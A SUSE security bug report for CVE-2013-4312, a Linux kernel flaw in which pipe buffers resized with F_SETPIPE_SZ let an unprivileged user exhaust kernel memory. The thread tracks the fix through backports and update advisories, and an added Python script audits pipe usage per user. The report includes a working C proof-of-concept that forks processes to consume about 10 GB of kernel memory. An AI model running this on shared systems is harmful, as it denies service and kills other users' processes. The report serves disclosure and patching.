Bug 839104 (CVE-2013-4312) - VUL-2: CVE-2013-4312: kernel: memory consumption by unprivileged user
Summary: VUL-2: CVE-2013-4312: kernel: memory consumption by unprivileged user
Status: RESOLVED FIXED
Duplicates: 922947
Alias: CVE-2013-4312
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Priority: P4 - Low  Severity: Normal
Target Milestone: ---
Deadline: 2016-08-15
Assignee: Security Team bot
QA Contact: Security Team bot
Whiteboard: maint:running:62977:moderate maint:re...
Reported: 2013-09-09 08:00 UTC by Alexander Bergmann
Modified: 2018-07-03 20:45 UTC
Description Alexander Bergmann 2013-09-09 08:00:00 UTC
Not public yet via linux-distros.

Date: Fri, 6 Sep 2013 11:35:09 -0700
From: Kees Cook
Subject: [vs-plain] Fwd: All memory consumption by a local unprivileged user.

CVE-2013-4312 was assigned to this issue.

-------------------------------
Description of the problem:

  Since 2.6.35, an unprivileged user who can execute arbitrary program can
  consume almost all memory in a way OOM killer cannot find it. Currently
  available solution for 3.8 and later is to use kmemcg control group
  ( memory.kmem.limit_in_bytes ), but use of cgred service is needed if
  we want to restrict usage based on uid. Therefore, I expect that either

    OOM killer takes into account how much memory is used by each uid

  or

    simple mechanism like /proc/sys/mm/per_uid_kmem_max which limits
    kernel memory each uid can allocate

  is added.

Background of the problem:

Commit 35f3d14d "pipe: add support for shrinking and growing pipes" added
fcntl(F_SETPIPE_SZ/F_GETPIPE_SZ). A local unprivileged user can easily do
forkbomb-like memory consumption, for 1048576 (default size which each pipe's
file descriptor can hold) x 1024 (default number of file descriptors per
process) x 1024 (default max user processes) can easily exceed the RAM the
machine has, and can kill many of other unprivileged users' processes before
the memory eater is chosen by the OOM killer. An example of memory eater which
will consume about 10GB of kernel memory is shown below.

---------- test.c ----------
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define F_SETPIPE_SZ (1024 + 7)

static void child(void)
{
        int fd[2];
        while (pipe(fd) != EOF &&
               fcntl(fd[1], F_SETPIPE_SZ, 1048576) != EOF) {
                int i;
                for (i = 0; i < 256; i++) {
                        static char buf[4096];
                        if (write(fd[1], buf, sizeof(buf)) != sizeof(buf)) {
                                printf("write error\n");
                                _exit(1);
                        }
                }
                close(fd[0]);
        }
        pause();
        _exit(0);
}

int main(int argc, char *argv[])
{
        int i;
        close(0);
        for (i = 2; i < 1024; i++)
                close(i);
        for (i = 0; i < 10; i++)
                if (fork() == 0)
                        child();
        return 0;
}
---------- test.c ----------
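For the defender side of the description above (checking whether a kernel has any per-user cap on pipe buffers, and measuring how much pipe buffer capacity each uid currently holds), here is an added audit script; it is not part of the bug report, of Kees Cook's mail, or of the kernel fix. It assumes a Linux host with /proc, uses the F_GETPIPE_SZ fcntl the report mentions (command number 1024 + 8, the sibling of the F_SETPIPE_SZ define in test.c), and reads /proc/sys/fs/pipe-max-size together with the pipe-user-pages-soft/hard sysctls that later kernels (4.5 and up) added and that are absent on the 3.0 and 3.12 kernels discussed here. The 256 MiB budget and the sample entries are constructed values.

```python
"""Audit per-uid pipe buffer capacity on a Linux host.

Added example, not part of the bug report: walks /proc, opens every pipe
file descriptor it can see, asks the kernel for its buffer capacity with
F_GETPIPE_SZ and sums the result per uid. Seeing other users' fds needs
root; the aggregation is a pure function so it can be exercised offline.
"""
import fcntl
import os
import stat
import sys
from collections import defaultdict

# Linux-specific fcntl command numbers (F_LINUX_SPECIFIC_BASE + 7 / + 8);
# the fcntl module only exports them as constants on Python 3.10+.
F_SETPIPE_SZ = getattr(fcntl, "F_SETPIPE_SZ", 1024 + 7)
F_GETPIPE_SZ = getattr(fcntl, "F_GETPIPE_SZ", 1024 + 8)

PAGE_SIZE = os.sysconf("SC_PAGE_SIZE")


def pipe_capacity(fd):
    """Return the kernel buffer capacity in bytes of an open pipe fd.

    This is capacity, not fill level: the kernel allocates pages lazily on
    write, so the sum over all pipes is an upper bound that a grow-then-fill
    pattern (as in test.c above) actually reaches.
    """
    return fcntl.fcntl(fd, F_GETPIPE_SZ)


def probe_local_pipe():
    """Create a throwaway pipe and return its default capacity (sanity check)."""
    r, w = os.pipe()
    try:
        return pipe_capacity(r)
    finally:
        os.close(r)
        os.close(w)


def pipe_sysctls(proc_root="/proc"):
    """Read the pipe-related sysctls that exist on this kernel.

    pipe-max-size (2.6.35+) caps what F_SETPIPE_SZ accepts for one pipe;
    pipe-user-pages-soft/hard (4.5+) cap all pipes of one user and do not
    exist on the kernels this bug tracks, so a missing key means the kernel
    has no per-user pipe limit at all.
    """
    out = {}
    for name in ("pipe-max-size", "pipe-user-pages-soft", "pipe-user-pages-hard"):
        try:
            with open(os.path.join(proc_root, "sys", "fs", name)) as f:
                out[name] = int(f.read().strip())
        except OSError:
            pass
    return out


def scan_pipes(proc_root="/proc"):
    """Yield (uid, pipe_inode, capacity) for every pipe fd visible to us.

    A pipe shared by several processes (parent and forked children) shows up
    once per fd, so deduplicate on the pipefs inode number.
    """
    seen = set()
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            uid = os.stat(os.path.join(proc_root, pid)).st_uid  # owner = euid
            fds = os.listdir(fd_dir)
        except OSError:
            continue  # process exited, or we are not allowed to look
        for fd in fds:
            path = os.path.join(fd_dir, fd)
            try:
                st = os.stat(path)  # follows the magic link to the pipe inode
                if not stat.S_ISFIFO(st.st_mode) or st.st_ino in seen:
                    continue
                # Opening /proc/<pid>/fd/N for a pipe opens that same pipe,
                # so F_GETPIPE_SZ on the new fd reports its capacity.
                h = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
            except OSError:
                continue
            try:
                cap = pipe_capacity(h)
            except OSError:
                cap = 0
            finally:
                os.close(h)
            seen.add(st.st_ino)
            yield uid, st.st_ino, cap


def totals_by_uid(entries):
    """Sum pipe capacity per uid over (uid, inode, capacity) triples."""
    totals = defaultdict(int)
    for uid, _ino, cap in entries:
        totals[uid] += cap
    return dict(totals)


def over_budget(totals, limit_bytes):
    """Return uids whose summed pipe capacity exceeds limit_bytes, largest first."""
    return sorted((uid for uid, t in totals.items() if t > limit_bytes),
                  key=lambda u: totals[u], reverse=True)


if __name__ == "__main__":
    # Constructed default budget; pass a byte count as argv[1] to override.
    limit = int(sys.argv[1]) if len(sys.argv) > 1 else 256 * 1024 * 1024
    print("pipe sysctls:", pipe_sysctls())
    totals = totals_by_uid(scan_pipes())
    for uid in over_budget(totals, limit):
        print(f"uid {uid}: {totals[uid]} bytes of pipe buffers (limit {limit})")
```

Run it as root to see every user's pipes; as an ordinary user it only reports your own. On a kernel that lacks pipe-user-pages-soft/hard the script prints no such keys, which is the condition under which the per-uid figure is the only cap-free signal you have; the kmemcg limit the report mentions (memory.kmem.limit_in_bytes) is the other mitigation path and is not inspected here.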
Comment 1 Swamp Workflow Management 2013-09-09 22:00:09 UTC
bugbot adjusting priority
Comment 2 Marcus Meissner 2013-11-27 21:39:35 UTC
not yet fixed
Comment 3 SMASH SMASH 2014-02-27 14:50:11 UTC
Affected packages:

SLE-11-SP3: kernel-source
SLE-10-SP3-TERADATA: kernel-source
SLE-11-SP1-TERADATA: kernel-source
SLE-11-SP2: kernel-source
Comment 5 Marcus Meissner 2014-03-13 14:47:55 UTC
There was no progress on the closed list and no publication.

Denial of service is always a bit hard to define in the kernel case; while we meanwhile assume protection mechanisms exist that trigger on bad users (e.g. ulimits or similar), if something is not catchable it might be considered
a security issue.

I pinged the list again.
Comment 8 Marcus Meissner 2014-09-29 09:59:55 UTC
Yes, let's close for now.
Comment 9 Jiri Slaby 2016-03-16 11:12:08 UTC
Reopening for reconsideration, because the fix landed in 3.12 as:
commit 3d024dcef2548028e9f9b7876a544e6e0af00175
Author: willy tarreau <w@1wt.eu>
Date:   Sun Jan 10 07:54:56 2016 +0100

    unix: properly account for FDs passed over unix sockets
    
    [ Upstream commit 712f4aad406bb1ed67f3f98d04c044191f0ff593 ]

But it breaks kABI heavily (struct user_struct change), so I will revert in SLE12.
Comment 10 Michal Hocko 2016-03-16 12:19:03 UTC
(In reply to Jiri Slaby from comment #9)
> Reopening for reconsideration, because the fix landed in 3.12 as:
> commit 3d024dcef2548028e9f9b7876a544e6e0af00175
> Author: willy tarreau <w@1wt.eu>
> Date:   Sun Jan 10 07:54:56 2016 +0100
> 
>     unix: properly account for FDs passed over unix sockets
>     
>     [ Upstream commit 712f4aad406bb1ed67f3f98d04c044191f0ff593 ]
> 
> But it breaks kABI heavily (struct user_struct change), so I will revert in
> SLE12.

Is the kABI a real concern? This structure should be pretty much internal. There is not even any public API to have new user structures.

Anyway, I do not think this is something super critical. We have other means how to deplete all the memory and DoS the system. I just think that we should try to patch this one if the kABI part is not super critical
Comment 11 Jiri Slaby 2016-03-18 14:32:31 UTC
(In reply to Michal Hocko from comment #10)
> Is the kABI a real concern? This structure should be pretty much internal.
> There is even not any public API to has new user structures.

Yes, correct. I released 3.12.57 today and merged it to SLE12. The kabi breakage could be worked around. SP2 will get it from stable too, so I think we can close now again.
Comment 12 Michal Hocko 2016-03-18 14:48:42 UTC
We probably want it for older kernels as well. This has been broken forever, I guess.
Comment 13 Michal Hocko 2016-07-26 13:07:44 UTC
I am sorry it took so long.

Pushed to cve/linux-3.0 and cve/linux-2.6.32. This should cover all branches.

Btw. Michal (CCed) has noticed there is a follow up fix 415e3d3e90ce ("unix: correctly track in-flight fds in sending process user_struct").

The commit log says:
"
    The commit referenced in the Fixes tag incorrectly accounted the number
    of in-flight fds over a unix domain socket to the original opener
    of the file-descriptor. This allows another process to arbitrary
    deplete the original file-openers resource limit for the maximum of
    open files. Instead the sending processes and its struct cred should
    be credited.
"

The backport would break kABI, which would be far from trivial to backport for old trees. But I think we do not have to lose sleep over that. If a process sends a fd over to another process over the socket it should trust it, because it is handing over its own security domain (open of a file) to it. Having an adversarial receiver can have other security implications already. So I believe that not having this follow up should be acceptable and still better than without 712f4aad406bb1 ("unix: properly account for FDs passed over unix sockets").

Let me know if I have missed something.

Bouncing back to the security team.
Comment 14 Marcus Meissner 2016-08-01 11:35:46 UTC
Let's so far consider not to fix this problem.
Comment 15 Michal Hocko 2016-08-01 12:05:53 UTC
*** Bug 922947 has been marked as a duplicate of this bug. ***
Comment 16 Swamp Workflow Management 2016-08-08 05:04:24 UTC
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2016-08-15.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/62924
Comment 17 Swamp Workflow Management 2016-09-06 13:09:12 UTC
SUSE-SU-2016:2245-1: An update that solves 25 vulnerabilities and has 22 fixes is now available.

Category: security (important)
Bug References: 839104,866130,919351,944309,950998,960689,962404,963655,963762,966460,969149,970114,971126,971360,971446,971729,971944,974428,975945,978401,978821,978822,979213,979274,979548,979681,979867,979879,980371,980725,980788,980931,981267,983143,983213,983535,984107,984755,986362,986365,986445,986572,987709,988065,989152,989401,991608
CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2015-7833,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2187,CVE-2016-3134,CVE-2016-3955,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5696,CVE-2016-5829,CVE-2016-6480
Sources used:
SUSE OpenStack Cloud 5 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Manager Proxy 2.1 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Manager 2.1 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Server 11-SP3-LTSS (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-ppc64-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
Comment 18 Swamp Workflow Management 2016-12-02 15:20:42 UTC
SUSE-SU-2016:2976-1: An update that solves 13 vulnerabilities and has 87 fixes is now available.

Category: security (important)
Bug References: 1000189,1001419,1002165,1003077,1003344,1003568,1003677,1003866,1003925,1004517,1004520,1005857,1005896,1005903,1006917,1006919,1007944,763198,771065,799133,803320,839104,843236,860441,863873,865783,871728,907611,908458,908684,909077,909350,909484,909618,909994,911687,915183,920016,922634,922947,928138,929141,934760,951392,956514,960689,963655,967716,968010,968014,971975,971989,973203,974620,976867,977687,979514,979595,979681,980371,982218,982783,983535,983619,984102,984194,984992,985206,986337,986362,986365,986445,987565,988440,989152,989261,989764,989779,991608,991665,991923,992566,993127,993890,993891,994296,994436,994618,994759,994926,995968,996329,996664,997708,998399,998689,999584,999600,999907,999932
CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2015-8956,CVE-2016-0823,CVE-2016-3841,CVE-2016-4998,CVE-2016-5696,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7117,CVE-2016-7425
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    kernel-docs-3.0.101-88.3
SUSE Linux Enterprise Server 11-SP4 (src):    kernel-bigmem-3.0.101-88.1, kernel-default-3.0.101-88.1, kernel-ec2-3.0.101-88.1, kernel-pae-3.0.101-88.1, kernel-ppc64-3.0.101-88.1, kernel-source-3.0.101-88.1, kernel-syms-3.0.101-88.1, kernel-trace-3.0.101-88.1, kernel-xen-3.0.101-88.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-default-3.0.101-88.1, kernel-pae-3.0.101-88.1, kernel-ppc64-3.0.101-88.1, kernel-trace-3.0.101-88.1, kernel-xen-3.0.101-88.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-bigmem-3.0.101-88.1, kernel-default-3.0.101-88.1, kernel-ec2-3.0.101-88.1, kernel-pae-3.0.101-88.1, kernel-ppc64-3.0.101-88.1, kernel-trace-3.0.101-88.1, kernel-xen-3.0.101-88.1
Comment 19 Swamp Workflow Management 2016-12-09 17:12:57 UTC
SUSE-SU-2016:3069-1: An update that solves 11 vulnerabilities and has 49 fixes is now available.

Category: security (important)
Bug References: 1000189,1001419,1002165,1004418,732582,839104,843236,909994,911687,915183,920016,934760,951392,956514,960689,963655,971975,971989,974620,976867,977687,979514,979595,979681,980371,982218,982783,983535,983619,984102,984194,984992,985206,986362,986365,986445,987565,988440,989152,989261,989779,991608,991665,991923,992566,993127,993890,993891,994296,994436,994618,994759,994926,996329,996664,997708,998399,999584,999600,999932
CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2016-0823,CVE-2016-3841,CVE-2016-4997,CVE-2016-4998,CVE-2016-5195,CVE-2016-5696,CVE-2016-6480,CVE-2016-6828,CVE-2016-7425
Sources used:
SUSE Linux Enterprise Real Time Extension 11-SP4 (src):    kernel-rt-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1, kernel-source-rt-3.0.101.rt130-65.1, kernel-syms-rt-3.0.101.rt130-65.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-rt-3.0.101.rt130-65.1, kernel-rt_debug-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1
Comment 20 Swamp Workflow Management 2017-01-30 19:14:33 UTC
SUSE-SU-2017:0333-1: An update that solves 46 vulnerabilities and has 31 fixes is now available.

Category: security (important)
Bug References: 1003077,1003925,1004517,1007944,1008645,1008831,1008833,1009443,1010150,1010467,1010501,1010507,1010711,1010716,1011482,1011685,1012422,1012832,1013038,1013531,1013542,1014746,1017710,1021258,835175,839104,863873,874145,896484,908069,914939,922947,927287,940966,950998,954984,956514,958000,960689,963053,967716,968500,969340,971360,971944,978401,978821,979213,979274,979548,979595,979879,979915,980363,980371,980725,981267,983143,983213,984755,986362,986365,986445,986572,989261,991608,991665,992566,993890,993891,994296,994436,994618,994759,995968,997059,999932
CVE References: CVE-2004-0230,CVE-2012-6704,CVE-2013-4312,CVE-2015-1350,CVE-2015-7513,CVE-2015-7833,CVE-2015-8956,CVE-2015-8962,CVE-2015-8964,CVE-2016-0823,CVE-2016-10088,CVE-2016-1583,CVE-2016-2187,CVE-2016-2189,CVE-2016-3841,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5829,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7117,CVE-2016-7425,CVE-2016-7910,CVE-2016-7911,CVE-2016-7916,CVE-2016-8399,CVE-2016-8632,CVE-2016-8633,CVE-2016-8646,CVE-2016-9555,CVE-2016-9685,CVE-2016-9756,CVE-2016-9793,CVE-2017-5551
Sources used:
SUSE Linux Enterprise Server 11-SP2-LTSS (src):    kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-source-3.0.101-0.7.53.1, kernel-syms-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src):    kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1
Comment 21 Marcus Meissner 2017-06-15 21:03:26 UTC
we released some fixes for this, so there is some mitigation now in place